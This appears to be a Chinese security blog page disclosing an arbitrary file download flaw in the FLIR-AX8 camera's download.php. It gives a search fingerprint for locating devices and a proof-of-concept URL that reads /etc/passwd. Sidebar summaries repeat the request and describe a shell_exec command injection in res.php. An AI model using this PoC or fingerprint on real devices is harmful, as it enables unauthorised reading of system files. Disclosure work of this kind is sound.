FLIR-AX8 download.php 任意文件下载

最新推荐文章于 2025-12-19 23:07:15 发布

原创最新推荐文章于 2025-12-19 23:07:15 发布 · 898 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#php #安全 #开发语言

网络安全专栏收录该内容

28 篇文章

订阅专栏

FLIR-AX8的download.php文件存在过滤不全的问题，导致出现任意文件下载漏洞。攻击者可通过特定URL参数下载服务器上的任意文件。

漏洞描述

FLIR-AX8 download.php文件过滤不全存在任意文件下载漏洞

漏洞影响

FLIR-AX8

网络测绘

app="FLIR-FLIR-AX8"

漏洞复现

登录页面

验证POC

/download.php?file=/etc/passwd

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

一个梦字

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

FLIR AX8 download.php 任意文件读取复现

iSee857的博客

10-08

963

FLIR-AX8是美国菲力尔公司（Teledyne FLIR）旗下的一款工业红外热像仪AX8，英文名为Teledyne FLIR AX8 thermal sensor cameras。菲力尔公司专注于设计、开发、生产、营销和推广用于增强态势感知力的专业技术，通过热成像、可见光成像、视频分析、测量和诊断以及先进的威胁检测系统，将创新的传感解决方案带入日常生活中，广泛服务于政府与国防、工业和商业市场。如非必要请勿将系统在公网部署。

FLIR AX8 res.php 代码执行

网安小白

09-24

659

参与评论您还未登录，请先登录后发表或查看评论

FLIR-AX8 任意文件下载(CNVD-2021-39018)

BeWorthyOf的博客

11-18

3349

FLIR-AX8存在任意文件下载漏洞。攻击者可利用漏洞下载相关系统配置文件。

FLIR-AX8 任意文件下载

thelostworld

05-12

596

FLIR-AX8 任意文件下载一、漏洞描述FLIR-AX8 download.php存在任意文件下载漏洞，直接访问可下载相关系统配置文件。二、影响版本FLIR-AX8三、漏洞复现访问主页：详细数据包：GET /download.php?file=/etc/passwd HTTP/1.1 Host: 127.0.0.1 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/5

FLIR-AX8热成像仪多个漏洞复现+代码分析

m0_64040060的博客

09-24

714

然后看下这三个判断，前两个是判断文件是否存在，且没有可控参数，第三个判断用shell_exec函数执行了一条命令，后面拼接了resource参数，而且最后一个是default，只要不符合前两个case的话，就会走到这里，所以这里直接输入;接下来是这三个地方接收了数据，第一个参数是文件名第二个是类型，第三个不知道干什么的，但是用三目运算符判断了一下，然后看下49行代码，这里判断了$is_attachment参数是否为真，如果为真的话这里是设置header头，问题不大，不耽误文件读取。

精选资源

openpose-1.7.0-binaries-win64-gpu-python3.7-flir-3d_recommended.zip

04-05

这个zip文件"openpose-1.7.0-binaries-win64-gpu-python3.7-flir-3d_recommended.zip"包含了OpenPose 1.7.0版本的预编译二进制文件，专为64位Windows系统、配备GPU支持以及Python 3.7接口的用户准备。FLIR 3D推荐...

openpose-1.5.0-binaries-win64-gpu-python-flir-3d_unity.z01

06-27

openpose-1.5.0-binaries-win64-gpu-python-flir-3d_unity.z01 Part02

WordPress更新警示：Elementor用户请暂缓升级至最新版本

wordpress学习笔记

12-15

437

过去几个月里，WordPress官方论坛、Elementor社区以及各大技术支持平台上涌现了大量求助帖，核心问题惊人的一致：“更新WordPress后，我的网站崩溃了!最后，记住这条黄金法则：如果你的网站运行良好且安全，没有迫切需要新功能或安全修补程序，那么“如果没有坏，就不要修理它”这句老话在WordPress更新中同样适用。这是一个复杂的工程挑战，需要时间。数据显示，超过60%出现问题的网站运行的是Elementor 3.10之前的版本，而他们升级到的WordPress版本却是6.2或更高。

对于Thinkphp5可能遇到的保存问题

知码客

12-18

140

文章摘要：在开发酒店小程序批量修改日历价格功能时，遇到保存部分数据后终止的问题。原因是模型对象$cmodel在循环外初始化，导致每次循环仍保留上一次的数据状态。解决方案是将$cmodel初始化移到循环内部，确保每次处理新数据时都使用全新的模型实例。虽然这类问题在开发中不常见，但需要注意模型对象的生命周期管理，避免因对象状态残留导致的数据操作异常。该案例提醒开发者要特别注意循环体内外变量作用域的问题。

WordPress定制开发最佳公司的用户画像

qq_26894175的博客

12-15

888

深入解析WordPress定制开发最佳公司所服务的典型用户画像，涵盖中大型企业数字化转型、电商平台专业运营、内容创作与媒体发布、SaaS服务平台建设、政府非营利组织、创意行业品牌展示、技术驱动创新应用、在线教育培训、地产汽车信息展示、餐饮服务本地运营等十大领域。文章详细分析各行业客户的特殊需求、技术挑战和解决方案，帮助企业准确定位自身需求并选择合适的WordPress技术服务商。云策WordPress建站16年专注WordPress技术服务，为各行业客户提供网站建设、定制开发、插件开发、主题开发和WooCo

poster自定义海报开发——海报组件开发

freedomhua的专栏

12-17

271

本文介绍了自定义海报组件的开发流程，包括组件定义、语言包设置和前后端实现。组件定义文件components.php需放置在特定目录，支持定义组件类型、图标、属性等参数。系统提供基础海报组件，开发者可根据业务需求扩展。前端需分别实现预览组件(preview-)和编辑组件(edit-)，其中预览组件需展示简单效果，编辑组件可调用框架封装的公共属性编辑功能。组件支持自定义字体，需将字体文件存放在指定目录。开发过程中需注意组件路径命名规范，前后端组件需保持对应关系。

PHP 值对象实战指南：避免原始类型偏执

qq_31470439的博客

12-17

705

本文介绍了如何在PHP项目中通过值对象(Value Object)避免原始类型偏执问题。作者指出常见的日期、金额等概念如果直接用string/int表示，会导致验证逻辑重复分散。通过将领域概念封装为值对象(如Date、Money类)，可以集中校验逻辑并增强代码表达力。文章展示了如何实现这些值对象，并赋予它们相关行为，还提供了在Laravel和Symfony框架中的集成方案。最后建议采用渐进式迁移策略，逐步用值对象替换原始类型，使代码更清晰、可维护且符合领域表达。

网络安全中级阶段学习笔记（七）：Web 安全之文件上传漏洞笔记1（包含upload-labs-master靶场前三关实战）

2501_91976946的博客

12-15

894

摘要：本文系统梳理文件上传漏洞攻防要点，包含漏洞定义、危害（如Webshell控制服务器）、检测流程及多种绕过技巧（JS验证、MIME-Type、黑名单等）。重点提出"白名单+多环节验证"防御方案，包括严格后缀验证、文件类型检测、权限控制等。补充靶场实践案例，演示通过修改后缀、利用解析特性实现漏洞利用。强调防御需结合前端限制、服务端校验与安全监控，构建纵深防护体系。

PHP 8.6 新增 clamp() 函数

qq_31470439的博客

12-15

440

PHP 8.6将新增clamp()函数，用于将值限制在指定范围内。该函数接收value、min和max三个参数：当value小于min时返回min，大于max时返回max，在范围内则返回原值。若min>max或出现NAN会抛出异常。clamp()适用于百分比限制、分页控制、日期校验等多种场景，配合命名参数使用更直观。这个简单但实用的函数能替代手动边界检查，使代码更简洁清晰。

迪文屏开发-多国语言-只需一组控件

weixin_47347638的博客

12-16

218

现在遇到一个问题就是我要做12组语言，但是，每一组的组件都是相同的，本方法就是一个一个的复制粘贴，可是加起来有几百页啊，我不想，我真的不喜欢做重复的事情。然后现在图标，记住选0.icl，没有0的升级软件版本，然后图标就选你自己的，比如我这里就跟上图一样是50-94。详情可以看这个，但是肯定有些人还是不懂啊，那我就待你操作一下。只是语言不同而已，，图片又有图标，最好分开点距离放。比如我的英语是23.icl，然后我16进制就是17，恰巧，迪文有适配多国语言。(出处: 迪文科技论坛)

有没有其他语言实现淘宝商品详情API接口采集的方案？

ID_18007905473的博客

12-17

408

除了 Python，淘宝商品详情 API 接口采集还可通过。

应急响应——知攻善防Web-3靶机详细教程

最新发布

m0_73812072的博客

12-19

515

今天继续给大家带来知攻善防Web-3靶机详细教程，其实基础的Windows应急响应的思路都是大差不差的；常见的几个点就是"计划任务“”开机启动项“”后台进程“”隐藏用户“等；本靶机与Web-1的步骤都是差不多的；目的就是为了巩固相应的知识；

让wordpress随机调用一张指定文件夹中的图片

wordpress学习笔记

12-19

134

做成短码：包一层 add_shortcode(‘random_pic’, fn() => ob_start() && 上面代码 && return ob_get_clean());目录里图片不多时 scandir 没压力;扔到首页模板：把上面代码粘到 front-page.php 或 index.php 你想出现的位置即可。区块/HTML 小工具：先 add_shortcode，再到小工具里写 [random_pic]。扫描你给的目录里所有 jpg|jpeg|png|gif 图片;

【Linux网络编程】应用层自定义协议与序列化

2401_82551617的博客

12-16

992

摘要：本文介绍了网络编程中结构化数据的传输方法，重点讲解了自定义协议与序列化的实现。通过构建网络计算器示例，详细说明了如何解决TCP粘包问题、使用Jsoncpp库进行序列化/反序列化，以及应用层协议的定制。文章包含服务端和客户端的完整代码实现，展示了从字节流处理到业务逻辑的完整流程，特别强调了协议报文格式设计（如"长度\r\n内容\r\n"）和分层架构思想（网络通信层与业务处理层解耦）。

python调用Flir.Atlas.Image.dll文件进行红外数据测量代码

09-13

在Python中调用Windows动态链接库（DLL）文件通常涉及使用`ctypes`模块，该模块允许Python代码加载DLL文件并调用其函数。`Flir.Atlas.Image.dll`是一个可能由FLIR热像仪或类似设备提供的库，用于处理红外图像数据。然而，需要注意的是，由于不同的设备和库可能有不同的函数接口和参数，以下是一个通用的示例，展示了如何使用`ctypes`加载和调用DLL中的函数。首先，你需要确保你的Python环境可以访问到`Flir.Atlas.Image.dll`文件。通常，这个DLL文件应该位于FLIR提供的安装目录下。然后，你可以使用以下代码模板来加载DLL并尝试调用其函数。 ```python import ctypes # 加载DLL文件 flir_atlas_image_dll = ctypes.WinDLL('路径\\Flir.Atlas.Image.dll') # 假设我们要调用的函数名为CalculateTemperature，这是一个示例名称 # 你需要根据实际的函数名和参数来调整下面的代码 # 设置参数类型，这里假设函数需要两个参数，都是整型 flir_atlas_image_dll.CalculateTemperature.argtypes = [ctypes.c_int, ctypes.c_int] # 设置返回类型，这里假设函数返回一个浮点型值 flir_atlas_image_dll.CalculateTemperature.restype = ctypes.c_float # 调用函数，传入参数 result = flir_atlas_image_dll.CalculateTemperature(参数1, 参数2) # 打印结果 print(f"测量结果: {result}") ``` 请注意，上述代码中的`CalculateTemperature`函数和参数类型都是假设的。你需要查看FLIR提供的文档或者DLL的头文件来获取正确的函数名和参数类型。由于具体函数名和参数类型未知，这段代码只是一个示例，用于展示如何通过`ctypes`模块调用DLL。实际使用时，你需要根据`Flir.Atlas.Image.dll`提供的具体函数名和参数进行相应的调整。